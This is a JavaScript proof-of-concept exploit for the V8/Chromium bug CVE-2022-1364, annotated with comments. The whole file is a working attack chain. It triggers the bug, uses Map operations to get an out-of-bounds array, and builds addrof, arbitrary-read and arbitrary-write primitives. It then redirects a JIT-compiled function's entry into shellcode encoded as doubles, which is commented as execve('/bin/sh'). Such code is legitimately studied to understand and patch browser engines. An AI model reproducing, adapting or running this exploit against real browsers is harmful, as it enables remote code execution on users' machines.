/*
CVE-2022-1364
HEAD @ 7a5f4f55aa58ab5ddf4349b415906d45b34777f3
https://bugs.chromium.org/p/chromium/issues/detail?id=1315901
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2022-1364
*/
/*
One 8-byte buffer viewed both as a Float64 and as a BigUint64, so the two
helpers below can reinterpret a double's bit pattern as an integer and back.
Defender note: this PoC is written against the V8 HEAD commit and tracker
entry given in the header above; the mitigation is a V8/Chromium build that
includes the fix referenced there.
*/
var bs = new ArrayBuffer(8);
var fs = new Float64Array(bs);
var is = new BigUint64Array(bs);
/* Reinterpret the 64 bits of a double as a BigUint64 through the shared buffer. */
function ftoi(val) {
const lane = 0;
fs[lane] = val;
const bits = is[lane];
return bits;
}
/* Reinterpret a BigUint64 bit pattern as a double through the shared buffer. */
function itof(val) {
const lane = 0;
is[lane] = val;
const asDouble = fs[lane];
return asDouble;
}
/* execve("/bin/sh", 0, 0); */
/*
Payload carried as an array of doubles; the author's comment above states
what it is meant to do. The values are data, not arithmetic: keep them
verbatim and in this order. Called in the warm-up loop below and once more
as the last statement of the file.
*/
const shell = () => {
return [
1.9711828979523134e-246,
1.9562205631094693e-246,
1.9557819155246427e-246,
1.9711824228871598e-246,
1.971182639857203e-246,
1.9711829003383248e-246,
1.9895153920223886e-246,
1.971182898881177e-246
];
};
/* Calls shell() 100000 times before anything else runs. The count appears
   to be engine-state warm-up for the PoC (TODO confirm) — do not change it. */
for (let i = 0; i < 100000; i++)
shell();
/*
Trigger for the bug tracked in the header. Returns e.y[0] after the tight
loop over _y; the exact shape of every statement and the 10000 iteration
count are part of the trigger, so treat this function as opaque and do not
reorder or restyle it.
Side effect: the assignment to Error.prepareStackTrace replaces the global
hook and never restores it, so it stays in effect for the rest of the script.
*/
function foo() {
const _x = a => (a => a.x())(a);
const _y = (a, b) => b.y(a, b, 1);
/* Returns the `this` of stack frame i, obtained through the prepareStackTrace hook. */
const _z = i => {
Error.prepareStackTrace = (_, x) => x[i].getThis();
return Error().stack;
};
function X() {}
X.prototype.x = () => {
let z = _z(3);
z[0] = 0;
e = { x: z, y: _z(3) };
};
/* Strict-mode function, so `arguments` is an unmapped object; it is passed
   as `this` to _x and then indexed with a. */
X.prototype.y = function(a, b) {
'use strict';
_x.call(arguments, b);
return arguments[a];
}
let e = null;
let x = new X();
for (let i = 0; i < 10000; i++)
_y(1, x);
delete e.x[0];
return e.y[0];
}
/*
Feeds foo()'s return value through a Map (the set/delete sequence below),
then returns `a`, a two-element double array. The caller labels the result
`oob` and the notes after it index far past two elements, so the Map
operations here appear to be what leaves `a` in that state (mechanism is
not visible in this file; TODO confirm against the tracker entry).
*/
function bar() {
let hole = foo();
let m = new Map();
m.set(1, 1);
m.set(hole, 1);
m.delete(hole);
m.delete(hole);
m.delete(1);
let a = new Array(1.1, 2.2);
m.set(16, -1);
m.set(a, 1337);
return a;
}
let oob = bar();
/* flt.elements @ oob[7] */
/* obj.elements @ oob[19] */
/* Two arrays allocated right after oob; the author's notes above give the
   oob indices at which their element storage is reached. Allocation order
   appears to matter here, so keep these declarations adjacent and in order. */
let flt = [1.1];
let tmp = {a: 1};
let obj = [tmp];
/*
Address-of primitive: combines the low 32 bits of oob[19] with the high
32 bits of oob[7], writes that back into oob[7], stores o into obj[0], and
returns the low 32 bits of flt[0] minus 1. Depends entirely on the layout
notes above; it is not a reusable helper.
*/
function addrof(o) {
let a = ftoi(oob[19]) & 0xffffffffn;
let b = ftoi(oob[7]) >> 32n;
oob[7] = itof((b << 32n) + a);
obj[0] = o;
return (ftoi(flt[0]) & 0xffffffffn) - 1n;
}
/* Read primitive: keeps the high 32 bits of oob[7], replaces the low part
   with p - 8n + 1n (the author's adjustment), then returns flt[0]'s bits.
   The store to oob[7] must happen before flt[0] is read. */
function read(p) {
let a = ftoi(oob[7]) >> 32n;
oob[7] = itof((a << 32n) + p - 8n + 1n);
return ftoi(flt[0]);
}
/* Write primitive: same oob[7] adjustment as read(), then stores the bits of
   x through flt[0]. Returns nothing; the store to oob[7] must precede the
   store to flt[0]. */
function write(p, x) {
let a = ftoi(oob[7]) >> 32n;
oob[7] = itof((a << 32n) + p - 8n + 1n);
flt[0] = itof(x);
}
/*
Final step: reads the field at +0x18 from shell's address, reads the value
at +0x10 from that, writes it back increased by 0x69, and calls shell()
once more. That last call is the payload trigger the header comment refers
to; nothing after it is expected to run, so this file belongs only in a
disposable test engine built at the listed HEAD commit.
*/
let code = (read(addrof(shell) + 0x18n) - 1n) & 0xffffffffn;
let entry = (read(code + 0x10n));
write(code + 0x10n, entry + 0x69n);
shell();